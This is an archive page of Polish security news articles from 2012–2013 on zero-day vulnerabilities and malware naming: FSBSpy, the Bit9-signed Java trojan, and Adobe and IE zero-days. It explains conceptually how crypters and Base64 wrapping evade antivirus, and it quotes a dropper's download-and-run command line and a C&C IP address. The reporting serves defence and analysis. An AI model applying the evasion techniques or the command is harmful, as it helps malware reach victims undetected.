Artykuły dotyczące tematu: Zero Day

dodany: 12.04.2013 | tagi: , ,

Czym jest FUD?

0

Artykuł ten ma na celu zbadanie poprawności nazewnictwa wirusów FUD – całkowicie niewykrywalny / nieusuwalny, z jęz. ang. Fully Undetecdable lub Fully Unremovable; UD – wykrywalny; oraz tak powszechnie stosowana nomenklatura malware zero day.

Do napisania tego artykułu zainspirowała mnie informacja, jakoby Zero Day odnosił się tylko do exploitów, a w przypadku nowego malware – FUD. Tak więc, czy „malware 0-day” jest poprawną nomenklaturą niewykrywalnych wirusów?

Czym jest FUD?

Całkowicie niewykrywalny nie odnosi się tylko do nowych i nienznaych wirusów. Przykład: jeśli złośliwy kod napisany w PHP zostanie wykryty przez program antywirusowy będzie on wykrywalny, ale jeśli ten sam kod zaszyfrujemy w Base64, który najpierw powinien odszyfrować się z Base64, a później wykonać zawarty tam kod, w ten sposób plik będzie znowu niewykrywalny. Jednak czasami pozyskanie kodu źródłowego malware staje się niemożliwe dla ponownej kompilacji w FUD. W takim wypadku stosuje się cryptory lub cryptery. Crypter posiada dwa pliki: builder oraz stub. Stub jest „mini” programem, który w zależności od autora będzie przechowywał drugi plik. Builder szyfruje wybrany plik zazwyczaj algorytmami XOR, RC4, TEA, 3DES. Np. builder szyfruje wykrywalny plik przy pomocy algorytmu z kluczem i zapisuje go w postaci RESOURCES w stub’ie. Stub jest niewykrywalny, zbudowany z dekodera oraz loadera. Stub pobiera z sekcji RESOURCES zaszyfrowany malware, by następnie przy pomocy klucza odszyfrować malware w pamięci. W następnym kroku, loader uruchamia malware z dropem lub bez drop’u. Z drop’em – oznacza to, że dekoder odkodowuje plik, zapisuje go na dysku i dopiero teraz loader uruchamia malware. Jeśli malware uruchamiane jest bez drop’u – oznacza to, że uruchamiany jest bezpośrednio w pamięci.

 

Tak więc, czym różni się FUD od UD?

UD jest wykrywalny przez co najmniej jeden program antywirusowy. UD – undectable odnosi się do znanych malware (know malware), ale tylko o ograniczonym zakresie zdolnych do wykrycia / usunięcia go skanerów antywirusowych. UD odnosi się także do unremovable (nie do usunięcia) – nieznany w sygnaturach, ale malware UD może być wykryte przez analizę heurystyczną.

Jeśli znany jest przynajmniej jeden sposób usunięcia – skanerem antywirusowym lub ręcznie np. po analizie logów z aplikacji firm trzecich takich jak OTL czy GMER (w przypadku rootkitów) to malware nie jest już FUD – mówi Arkadiusz Zakrzewski – Specjalista pomocy technicznej AVG.

Z chwilą pierwszego ataku, który powoduje ujawnienie się malware`u, następuje wykorzystanie 0-day`a i rusza proces zdobycia sampla, analiza i zniesienie statusu FUD, dystrybucja aktualizacji, która obejmuje nowy malware.

FUD – dotyczy tylko wyłącznie procesu „wykrywania”. Przedmiotem wspomnianej detekcji może być exploit, shellcode czy payload. Najcześciej w parze z 0day idzie FUD exploit, FUD shellcode (często) oraz FUD payload (czyli malware, który został pobrany za pomocą shellcode).

 

Czym jest Zero Day?

– Wypowiedź nie jest oficjalnym stanowiskiem AVG, lecz opinią Arkadiusza Zakrzewskiego, specjalisty pomocy technicznej.

Moim zdaniem 0day jest określeniem powagi zagrożenia, a nie jego typu. Zero day to zawsze priority very high/critical czyli incydent o bardzo dużym zagrożeniu, bo albo jest możliwy atak na bardzo dużej liczbie użytkowników np. luka w bardzo popularnym oprogramowaniu – przykład idealny to od zatrzęsienia 0day na IE czy Flasha albo atak 0-day jest bardzo dużym zagrożeniem np. kompletne rozkładanie na łopatki Windowsów przez exploit..

0-day to też atak z wykorzystaniem luki, która nie jest nikomu znana, szczególnie developerom danej aplikacji. Nowy exploit na starą dziurę w Windows już nie będzie 0-day`em bo do ataku wykorzystuje już znaną lukę, dla której albo istnieje już patch/workaround i infekcja ma szanse powodzenia tylko na nieaktualnym oprogramowaniu albo taki patch jest w trakcie opracowywania, a więc żywot infekcji na taką lukę będzie bardzo krótki.”

0-day odnosi się tylko do luk w oprogramowaniu czyli exploitów. Zero-day mówi nam, ile dni miał producent danego oprogramowania na załatanie dziury. Jak nazwa wskazuje, producent miał 0 dni, czyli mamy do czynienia ze scenariuszem:

  • wykrycie dziury
  • stworzenie exploita
  • dystrybucja wild

 

Pierwsze informacje o luce pochodzą z dystrybucji „wild” czyli od userów, którzy padli ofiarą exploita. Specjaliści analizują exploita i dowiadują się o lokalizacji dziury w programie. Sumarycznie, producent miał 0 dni na załatanie dziury, bo nawet o niej nie wiedział (lub wiedział ale nic nie zrobił).

„Malware zaś to ogólne określenie złośliwego oprogramowania. Zarówno exploit jak i backdoor czy trojan mieszczą się w definicji malware`u i każdy z nich może być poziomu 0day threat, czyli po pierwsze wykorzystywać nieznaną i niezabezpieczoną wcześniej lukę, a po drugie atakować popularne oprogramowanie (to najczęściej spotykane 0-day`e) – mówi Arkadiusz Zakrzewski.

 Nomenklatura wg F-Secure

_Jakaś_Nazwa_.0Day.Malware jest to nazwa dla nowego, niezdefiniowanego malware wykrytego przez sygnatury generyczne. Jeśli o takiej nazwie zostanie zablokowane zagrożenie oznacza to, że malware jest niezdefiniowane i nie posiada podpisu w postaci definicji. Jednakże zagrożenie może zostać wykryte za pomocą analizy heurystycznej, czyli w przypadku F-Secure – za pomocą technologii zwanej Zero-Hour Protection zaimplementowanej w niektóre produkty F-Secure z rodziny Antivirus. W przypadku przeanalizowania wirusa, nomenklatura np. Email.0Day.Malware zostaje zastąpiona generyczną, rodzajową nazwą malware.

 

Podsumowując

– nomenklatura zero day to nie tylko luka w oprogramowaniu, ale także powaga zagrożenia

– malware 0 day to poprawne nazewnictwo nowych wirusów, które wykorzystują nowe, nieznane luki lub atakują oprogramowanie (backdoor, exploit, trojan)

– malware FUD to nazewnictwo niewykrywalnych wirusów przez skanery antywirusowe (z definicji oraz poprzez heurystykę)

Malware 0 day = malware FUD

 

Źródło: AVLab.pl

dodany: 11.03.2013 | tagi: , ,

Tajemnica luki zero-day w Adobe

0
Tajemnica luki zero-day w Adobe

SophosLabs zostało poproszone o pomoc w znalezieniu informacji o malware wykrytym podczas dziwnego ataku. Znalezisko jest co najmniej intrygujące. Wygląda na to, że badacze wskoczyli w sam środek rozwoju i testowania tajemniczego projektu, dlatego byli chętni podzielić się zdobytą wiedzą.

 

Co znaleziono?

Odkryto środowisko testowe malware, błąd zero-day i kilka cyfrowo podpisanych malware. Co dziwne – pliki malware nie korzystały ze sztuczek przeciwko debugowaniu, albo ukrywających złośliwe oprogramowanie przez antywirusami, których można by spodziewać się po tego typu oprogramowaniu. Wręcz przeciwnie – ekipa z SophosLabs znalazła wersję zawierającą ułatwienia debugowania. Ścieżki do tego celu zdają się sugerować, że pliki są częścią tajnych operacji.

1

Oczywiście w przypadku tajnych operacji byłoby mocno nieprawdopodobne popełnienie tak podstawowych błędów. Najprawdopodobniej podobnych nazw użyto jako zapory dymnej w celu wywołania zakłopotania. To co odkryto wyglądało na środowisko testowe używane przez grupę kryminalną w celu przetestowania swojego ostatniego dzieła. Dodatkowo cyfrowy podpis użyty w złośliwym oprogramowaniu występował już wcześniej w innych miejscach – co zauważyli ludzie z Kaspersky Labs w złośliwym kodzie wykorzystującym inną lukę zero-day. Czas pogrzebać w tym głębiej.

 

Składniki malware

Atak zaczął się z wysyłaniem do odpowiednich osób e-maili zawierających informacje, które powinny nakłonić odbiorcę do kliknięcia w link. Link prowadził do grupy złośliwych komponentów, hostowanych gdzieś w Turcji. Na tym etapie ataku komputery miały zostać przejęte za pomocą eksploita na Adobe Flash. W plikach konfiguracyjnych ekipa Sophos zauważyła, że celem była tylko przeglądarka Firefox i nawet po podjęciu wysiłku, nie udało im się uruchomić ataku bez ręcznej pomocy. Taki sposób nazywa się często „spoon-feeding” (z ang. ‚karmić łyżeczką’, w przenośni oznacza niestawianie wyzwań, prowadzenie za rękę, podawanie na tacy) . W połączeniu z innymi rzadko spotykanymi w przypadku malware rozwiązaniami można wyciągnąć wniosek, że programiści nie skończyli jeszcze pracy nad atakiem. Mimo to, niepełna wersja programu nie przeszkadza im w analizie zamierzonego sposobu działania. Wiedza, co chcą zrobić cyberprzestępcy, może być przydatna dla deweloperów oprogramowania, w celu załatania lub wykrycia potencjalnych dziur zanim zostaną one wykorzystane.

 

Jak miał wyglądać atak (w uproszczeniu)

Na początku kilka złośliwych plików zostaje ściągniętych na komputer:

  1. Program ściągający, spakowany w pliku nazwanym scode.dll, który jest wrzucany do katalogu instalacji Flash – tuż obok innych plików z bilbiotekami;
  2. Plik shellcode o nazwie scodeexp.txt (do odpalenia na Windowsie XP);
  3. Plik shellcode o nazwie scode.txt (na inne wersje Windowsa).

Produtky Sophosu wykrywają ww. pliki jako Troj/FSBSpy–A.

Proces zarażania

I tu zaczyna się zabawa:

  1. shellcode ładuje plik scode.dll do wykonania brudnej roboty (tutaj plik dll jest zwykłym plikiem wykonywalnym w specjalnym formacie);
  2. 2.    dll zawiera wbudowany plik exe, który jest wrzucony do tymczasowego folderu o ciekawej nazwie – taskmgr.exe;
  3. dll odpala taskmgr za pomocą linii poleceń: dl http://www.[wycięte]/​explorer.exe.

Fałszywy plik wykonywalny taskmgr nie jest zbyt ambitny. Nie sprawdza, czy pierwszy parametr to dl i nie sprawdza, czy drugi rzeczywiście jest adresem URL. Jego działanie jest proste – ściąga cokolwiek znajdywało się w podanym adresie, zapisuje do tymczasowego folderu i uruchamia proces. Jednak to nie koniec ;)

Keidy zostaje wywołany podrobiony plik explorer.exe kopiuje sam siebie do folderu autostartu wybierając mniej podejrzaną nazwę IAStorIcon.exe. Teraz komputer jest już aktywnie zainfekowany i zaraza jest stała (ciekawy sposób mówienia, że malware przeżyje pomiędzy logowaniami i rebootami zamiast umierać tuż po skończeniu sesji użytkownika). Program ściągający został skompilowany w trybie debugowania, więc zawiera odniesienia do plików PDB. PDB, czyli Program Database – pliki, w których zawarte są symboliczne informacje o programie. Przeważnie nie otrzymujesz programów z informacjami do debugowania. Po pierwsze – daje to trochę informacji o wnętrzu programu, a po drugie – znacząco zwiększa wielkość pliku wykonywalnego.

Nazwy plików PDB są ciekawe:

C:ClassifiedProjects​ProjectDefense​Firefox­Binary­Loaded­WithCertificate​Loader­FirefoxSigned​Loader­ReleaseFinalCERT.pdb (z pliku DLL).

C:Classified​Investigations​National­Security​sco.pdb (z pliku EXE).

Jak już wcześniej zostało wspomniane, nazwy nie tylko sugerują poufną operację bezpieczeństwa, ale wręcz przesadnie to pokazują. Jest nieprawdopodobnym, żeby takie operacje używały aż tak oczywistych nazw plików, więc prawdopodobnie jest to tylko zapora dymna.

2

Samo malware – explorer.exe – jest podpisane cyfrowo za pomocą przekonującego certyfikatu, a bynajmniej nie za pomocą certyfikatu, który jest zrobiony samodzielnie i już wygasł. Produkty Sophosu wykrywają podpisane pliki jako Troj/FSBSpy–B.

Cel malware

Fałszywy program explorer.exe to malware typu zombie. Lepiej znane jako bot. Komunikuje się z centralą za pomocą serwera Command-and-Control (w skr. C&C, ‚komenda i kontrola’) używając numeru IP należącego do usługodawcy z Holandii.

3

W tym złośliwym oprogramowaniu można wyróżnić trzy główne funkcje:

  1. pobiera podstawowe informacje o systemie;
  2. poprzez zdalne wydanie polecenia może zrobić zrzut ekranu i wysłać go na odpowiedni serwer;
  3. poprzez zdalne polecenie może ściągnąć i uruchomić nowe malware.

O ile system C&C bota jest bardzo prosty, to obsługa pobierania nowego malware jest stosunkowo skomplikowana. Ściągnięte złośliwe programy nigdy nie pokazują się jako pliki na dysku, co zdecydowanie utrudnia zauważenie ich obecności w systemie. Badany explorer.exe ma wbudowane ładowanie oprogramowania bezpośrednio do pamięci operacyjnej. Obsługuje to importowanie, relokację i wiele innych procesów – robi dokładnie to samo, co system operacyjny podczas uruchamiania programu z dysku. Jak tylko nowe pliki zostaną ściągnięte, zbudowany zostanie obraz wykonywalny w pamięci – odnosi się do niego w sposób bezpośredni – bez pośrednictwa, tworzenia osobnych wątków czy procesów.

 

Co zostaje wykradzione

FSBSpy-B zaczyna od wysłania wiadomości o systemie zawierających podstawowe informacje, jak:

  • rodzaj jednostki CPU,
  • ilość pamięci RAM,
  • wielkość dysku,
  • ilość wolnego miejsce na dysku,
  • wersję systemu Windows,
  • detale rejestracji,
  • strefę czasową,
  • SID (numer identyfikacji bezpieczeństwa – służy identyfikacji użytkowników i grup w systemie),
  • listę zainstalowanych aplikacji.

Komunikacja z serwerem C&C, w tym wysyłanie i pobieranie danych, jest szyfrowana za pomocą algorytmu AES – klucz do szyfrowania jest wbudowany w fałszywy explorer.exe. Złośliwy program zawiera także funkcję do znajdywania plików o nazwach *.tmp w folderze tymczasowym i wysyłania ich na serwer. Jednak ten fragment nigdy nie jest używany – kolejna wskazówka, że malware nie jest kompletne i skończone.

4

Na koniec warto wspomnieć, że oprogramowanie jest pełne wiadomości ułatwiających debugowanie. Dodatkowo jeśli uruchomiony jest jako proces o ID4 (proces systemowy), malware wysyła sekwencję alertów pokazujacych postęp działania.

Profesjonalnie i amatorsko

Cały program nie jest skończony i wygląda na zbiór modułów, które jeszcze nie najlepiej ze sobą współpracują. W kodzie widać wiele nieporęczności, które są zbalansowane wykorzystaniem pluginów bezpośrednio w pamięci RAM oraz użyciem nieznanego wcześniej exploita zero-day na Flash. Ekipa z SophosLabs doszła do wniosku, że jest to mieszanka zintegrowanych po amatorsku części wypracowanych przez profesjonalistów.

 

dodany: 01.03.2013 | tagi: , ,

Powiązanie zero-day Javy z wpadką Bit9

0

Pamiętacie ostatnią wpadkę firmy Bit9? Zgadnijcie co  wykorzystano w najnowszym błędzie zero-day Javy. Wszystko to powiązano z luką opisaną pod CVE-2013-1493. W rezultacie tego błędu możliwe jest wykonanie dowolnego kodu – w tym celu podrzucany jest trojan.Naid (nazwa zdefiniowana przez Symanteca). Jest on zawarty w złośliwej bibliotece DLL. W następstwie jego działania zainfekowana maszyna nawiązywała komunikację z serwerem Command-and-control (C&C), który był zlokalizowany pod adresem IP 110.173.55.187.

Jak się okazało owy trojan został podpisany wykradzionym certyfikatem od Bit9. Na poniższej grafice przedstawiono schemat działania:

 

symantec Bit 9

Atak rozpoczyna się odwiedzeniem strony z złośliwym plikiem JAR, który został ochrzczony przez Symanteca jako Trojan.Maljava.B. Złośliwiec ten wykorzystuje lukę opisaną w/w CVE-2013-1493. Jeśli inicjalizacja trojana się powiedzie, to następnie jest pobierany plik svchost.jpg, który w rzeczywistości jest dropperem. W rezultacie jego działania na komputerze umieszczana jest złośliwa biblioteka appmgmt.dll, która zawiera właśnie owego trojana Naid.

Ten sam rodzaj ataku stwierdziła firma FireEye – badacze zauważyli, że problem ten występuje w przypadku Javy v1.6 z aktualizacją nr 41 i Javą v1.7 z aktualizacją nr 15.

dodany: 20.02.2013 | tagi: , , ,

Linux zły i niebezpieczny

2

Pamiętacie jak jeden polityk oskarżał drugiego, że jego dziadek służył w Wehrmachcie? Psychologowie mówili wtedy, że wyciąganie takich „spraw” ma na celu ukrycie niskiej samooceny polityka, który takie rewelacje wygłasza. Mam wrażenie, że to, co robi Trustwave, działa na tej samej zasadzie.

Firma Trustwave twierdzi, że luki zero-day w kernelu Linuksa pozostają niezałatane dwa razy dłużej, niż ma to miejsce w Windowsie.

Ta część raportu zdaje się opierać nie na podanych w zestawieniu liczbach pokazujących krytyczne luki wykryte w jądrze wg ustalonego systemu CVSS (Common Vulnerability Scoring System), gdzie Windows przebija Linuksa trzykrotnie (Linux 9, Windows 34), a na badaniu 4 luk typu zero-day.

Ogólny poziom ważkości luk w Linuksie (7,68) był niższy niż w Windowsie (8,41).

Żeby była jasność, raport stawia tezę, że Linux pozostaje mniej bezpiecznym systemem niż Windows na podstawie 4 przykładów, mając nieco więcej niż jedną czwartą dziur znalezionych w Windowsie będących mniej poważnymi niż Windows? Czy ma to dla Was jakikolwiek sens? Bo nie dla mnie.

Z perspektywy użytkownika obu systemów w 2012 roku muszę przyznać, że nie było miesiąca, w którym Microsoft nie naprawiał krytycznych problemów w swoim oprogramowaniu twierdząc, że robi to, bo nowsze wersje mają lepsze zabezpieczenia niż starsze.

W tym samym czasie Linux, który oczywiście nie jest całkowicie bezpieczny, bo, to ważne, żaden system operacyjny na świecie nie jest w 100% bezpieczny, w dalszym ciągu nie traci na zaufaniu Wikipedii, Facebooka, Google czy Nowojorskiej i Londyńskiej Giełdy Papierów Wartościowych.

Można się zastanawiać, dlaczego tak jest. I po zastanowieniu odpalić Google i sprawdzić czym jest Trustwave i co robi. Po tym kroku dowiecie się, że Trustwave chwali się swoim partnerstwem z Microsoftem w pracach nad dostosowaniem ich aplikacji ModSecurity Web Application Firewall do Internet Information Server (IIS) i współpracą z Microsoft Security Response Center.

Jeśli poszukacie dokładniej, dowiecie się, że reputacja Trustwave wisi na włosku po tym, jak sprzedawali certyfikaty SSL wiedząc, że mogą być użyte do aktywnego przechwytywania typu man-in-the-middle ruchu HTTPS.

dodany: 16.02.2013 | tagi: , ,

Adobe potwierdza ataki spowodowane dziurą w Readerze

3

Luka zero-day w Adobe Reader i Acrobat została wykorzystana przez szereg ukierunkowanych ataków na podatne komputery.

W biuletynie bezpieczeństwa Adobe potwierdziło, że luki mogą powodować problemy z Readerem i Acrobatem, co potencjalnie otworzy drzwi atakującemu i pozwala na przejęcie kontroli nad systemem.

Ale potencjalne przejęcie to chyba niedomówienie miesiąca. Adobe jest w posiadaniu raportów, które mówią dokładnie i bez ogródek, że luki zostały użyte w atakach, które oszukały wielu użytkowników Windowsa i namówiły do otwarcia zainfekowanego pliku PDF wysłanego im w e-mailu.

Adobe ciągle pracuje nad rozwiązaniem problemu z luką i obiecuje raportować o postępach. W międzyczasie użytkownicy Windowsa używający Adobe Readera XI i Acrobata XI powinni chronić się przed exploitem przez włączenie widoku chronionego:

  • Otwórz Reader lub Acrobat.
  • Kliknij w menu Edycja i wybierz Preferencje, a następnie kliknij na Bezpieczeństwo lub Zwiększenie Zabezpieczeń.
  • W sekcji chroniony widok (Protected View) kliknij na przycisk w górnej części okna i włącz widok plików z miejsc potencjalnie niebezpiecznych.
  • Zatwierdź klikając na OK.

Rozwiązanie tymczasowe pomaga jedynie użytkownikom produktów Adobe w wersji XI korzystających z nich na Windowsie.

Lukę odkryła podobno firma FireEye, ale doszli do porozumienia z Adobe i postanowili nie publikować szczegółów technicznych luki.

Chyba nie musimy przypominać o zachowaniu ostrożności przy otwieraniu nieznanych plików PDF?

dodany: 14.01.2013 | tagi: , , , , , , ,

Microsoft łata groźną dziurę w starszych IE

0

Niedawno informowaliśmy Was o dość poważnej luce w przeglądarkach Internet Explorer 8 i jego starszych wersjach. Microsoft co prawda zaproponował wtedy obejście problemu praktycznie metodą „jednego-kliknięcia”, a przecież są użytkownicy, którzy nie interesują się specjalnie bezpieczeństwem (zdecydowana większość użytkowników IE należy do tej grupy ;)). Poza tym nadal są osoby, które korzystają z Windows XP, gdzie nie możliwe było zainstalowanie nowszej wersji przeglądarki (nie podatnej na ten problem), bo po prostu nie ma nowszej wersji pod ten system.

Poprawka ta jest sklasyfikowana jako krytyczna i zostanie samoczynnie zainstalowana, o ile mamy włączone automatyczne aktualizacje. Ci którzy tego nie mają mogą ją zainstalować ręcznie – stosowną wersję poprawki można pobrać z strony technet.microsoft.com.

Aktualizacja ta jest oznaczona numerem 2799329 i oczywiście w pełni rozwiązuje problem możliwości zdobycia przez atakującego tych samych uprawnień, co aktualnie zalogowany użytkownik.

Po zainstalowaniu poprawki wymagany jest niestety restart systemu. O łatce jest też mowa w webcaście, który jest dostępny po zarejestrowaniu na stronie Microsoftu.

dodany: 29.12.2012 | tagi: , , , , , ,

Groźna dziura w IE8 dla wybranych

3

W starszych przeglądarkach Internet Explorer w wersjach 6, 7 i 8 odkryto poważną lukę w zabezpieczeniach. Dziurę tę wykryła firma FireEye, która zajmuje się bezpieczeństwem IT. Firma natrafiła na nią poprzez odkrycie przyczyny skompromitowania strony Rady Stosunków Zagranicznych USA (z ang. Council on Foreign Relations).
Atak wykorzystuje Adobe Flash i działa nawet w najświeższej wersji IE8. Dustin Childs z Microsoftu podał, że usterka dotyczy także wcześniejszych wersji IE. Poinformował jednocześnie o tym, że edycje 9 i 10 są wolne od tego buga.

Exploit startuje wyłącznie, jeśli nasz język systemowy jest jednym z poniższych:

Następnie wykorzystuje cookie do zapewnienia sobie bytu w przypadku każdego konta użytkownika:

Funkcja DisplayInfo() sprawdza kiedy użytkownik ostatni raz odwiedził stronę:

 

Po tym skrypt próbuje załadować plik today.swf, który wykorzystuje lukę w IE. Gdy się to powiedzie, exploit ściąga plik xsainfo.jpg, który jest faktycznie zakodowaną złośliwą biblioteką test_gaga.dll.

O kompromitację strony CFR są podejrzani Chińczycy, z tego względu, że nazwa pliku jest zakodowana w języku chińskim i mandaryńskim. Poza tym złośliwe działanie było zorientowane na wybranych użytkowników.

test_gaga dll

 

Co prawda, strona nie jest raczej u nas odwiedzana (a nawet jeśli, to i tak w przypadku ustawienia języka polskiego, exploit nie uruchomiłby się). Strona CFR ogólnie zawiera konta około 4700 oficjeli, dziennikarzy i innych członków, więc problem jest dość poważny. Większość infekcji miała miejsce w ubiegły wtorek/środę. Samo włamanie na stronę miało miejsce 21 grudnia o godzinie 14 tamtejszego czasu. Sprawą zajęło się FBI.

Na szczęście użytkowników IE8 nie ma już wielu, ale nadal znaleźć można urzędy korzystające z Windowsa XP, gdzie nie można skorzystać z nowszych wersji IE. Inne przeglądarki to zazwyczaj abstrakcja, jeśli chodzi o używanie. Microsoft póki co nie potwierdził, kiedy wyda aktualizację naprawiającą ten problem.

dodany: 20.09.2012 | tagi: , , , ,

Microsoft wydaje ważną aktualizacje zatykającą Zero-Day

0

W dniu wczorajszym Microsoft wydał ważne narzędzie o nazwie FixIt, które ma naprawić poważną lukę w zabezpieczeniach przeglądarki Internet Explorer. Narzędzie to zostało wydane po poniedziałkowej informacji Zero-Day.

Użytkownicy, którzy są dość ostrożni i świadomi ochrony, mogą poczekać do najbliższego piątku, gdyż wtedy MS wyda stosowną poprawkę, która w pełni rozwiąże problem bezpieczeństwa. Przypomnijmy, iż owa dziura została znaleziona w poniedziałek przez Eric’a Romanga i pozwala na łatwe zastosowania zdalnej rodziny trojanów RAT Poison Ivy. Wystarczyło zainstalować wtyczkę PlugX RAT.

Microsoft potwierdził istnienie problemu we wtorek, dając wytyczne administratorom sieci, jak zapobiec niebezpieczeństwu. Samo narzędzie FixIt to tylko rozwiązanie doraźne do czasu wydania piątkowej poprawki, która będzie dostępna bezpośrednio przez mechanizm aktualizacji systemu Windows. FixIt dostępny jest do pobrania z tego miejsca.